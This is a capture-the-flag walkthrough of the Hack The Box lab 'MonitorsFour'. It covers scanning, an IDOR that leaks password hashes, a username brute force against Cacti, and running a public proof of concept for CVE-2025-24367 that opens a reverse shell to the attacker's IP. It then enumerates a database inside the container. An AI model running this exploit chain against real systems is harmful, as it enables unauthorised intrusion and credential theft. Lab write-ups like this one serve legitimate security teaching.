# MonitorsFour HTB Walkthrough
### Scanning
```bash
nmap -p- --min-rate 1000 -vv 10.129.2.70
```
```bash
PORT STATE SERVICE REASON
80/tcp open http syn-ack ttl 127
5985/tcp open wsman syn-ack ttl 127
```
```bash
nmap -p80,5958 -sCV -v 10.129.2.70
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 127 nginx
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to http://monitorsfour.htb/
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
```
> Port 80 redirects to `monitorsfour.htb` add it to `/etc/hosts`.
### Website (80)
#### Directory Fuzzing
```bash
┌──(l1nuxkid㉿kai)-[~/HTB/MonitorsFour]
└─$ ffuf -u http://monitorsfour.htb/FUZZ -w /usr/share/wordlists/dirb/common.txt -ac -ic
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://monitorsfour.htb/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirb/common.txt
:: Follow redirects : false
:: Calibration : true
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
bNNiacED [Status: 200, Size: 97, Words: 1, Lines: 6, Duration: 100ms]
[Status: 200, Size: 13688, Words: 3598, Lines: 339, Duration: 101ms]
contact [Status: 200, Size: 367, Words: 34, Lines: 5, Duration: 104ms]
controllers [Status: 301, Size: 162, Words: 5, Lines: 8, Duration: 103ms]
forgot-password [Status: 200, Size: 3099, Words: 164, Lines: 84, Duration: 109ms]
login [Status: 200, Size: 4340, Words: 1342, Lines: 96, Duration: 167ms]
static [Status: 301, Size: 162, Words: 5, Lines: 8, Duration: 101ms]
user [Status: 200, Size: 35, Words: 3, Lines: 1, Duration: 406ms]
views [Status: 301, Size: 162, Words: 5, Lines: 8, Duration: 110ms]
:: Progress: [4615/4615] :: Job [1/1] :: 215 req/sec :: Duration: [0:00:16] :: Errors: 0 ::
```
#### IDOR `/user` Endpoint
Browsing to `/user` returns:
```bash
{"error": "Missing token parameter"}
```
Testing sequential values like `?token=1`, `?token=2` returns `invalid token`. But `?token=0` leaks sensitive data:
```
http://monitorsfour.htb/user?token=0
```
This reveals **usernames and MD5-hashed passwords**. The hashes were cracked using CrackStation:
```
Password: wonderful1
```
Candidate usernames extracted from the response:
* `admin` (Marcus Higgins)
* `mwatson`
* `janderson`
* `dthompson`
### Vhost Enumeration
```
gobuster vhost -u http://monitorsfour.htb -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt --append-domain
[+] Url: http://monitorsfour.htb
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt
[+] User Agent: gobuster/3.8
[+] Timeout: 10s
[+] Append Domain: true
[+] Exclude Hostname Length: false
===============================================================
cacti.monitorsfour.htb Status: 302 [Size: 0] [--> /cacti]
```
Add to `/etc/hosts` and browse. The login page exposes the version:
#### Username Enumeration
With `password=wonderful1` confirmed and multiple candidate usernames but looking at the admin it is `super user` and have another name field which has `marcus higgins` , using **Burp Suite Intruder** to brute-force the username field against the Cacti login endpoint.
Btw we can see the version at the bootom of the page
`Version 1.2.28 | (c) 2004-2026 - The Cacti Group`
All Possible Username generation
```
username-anarchy Marcus Higgins | tee possible_username
```
Set the payload position on the `username` parameter only, use the candidate list as the wordlist, and filter by response length difference.
BOOM!
Login to `cacti.monitorsfour.htb` as `marcus` succeeds.
```
marcus :: wonderful1
```
### Initial Access CVE-2025-24367 Cacti Authenticated RCE
POC:
Cacti 1.2.28 is vulnerable to an authenticated remote code execution vulnerability.
```bash
git clone https://github.com/TheCyberGeek/CVE-2025-24367-Cacti-PoC.git
cd CVE-2025-24367-Cacti-PoC
python3 exploit.py -u marcus -p wonderful1 -url http://cacti.monitorsfour.htb -i 10.10.14.168 -l 443
```
Gained shell as `www-data` inside a **Docker container**.
### Post-Exploitation
#### Database Enumeration
Database credentials were found in the .env. Connect to the internal MariaDB instance:
```
mysql -h mariadb -P 3306 -u monitorsdbuser -p monitorsfour_db
```
```
use monitorsfour_db;
MariaDB [monitorsfour_db]> show tables;
+---------------------------+
| Tables_in_monitorsfour_db |
+---------------------------+
| changelog |
| customers |
| invoice_tasks |
| invoices |
| tasks |
| users |
+---------------------------+
```
### Privilege Escalation
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://l1nuxkid.gitbook.io/l1nuxkid-docs/hackthebox/monitorsfour-htb-walkthrough.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.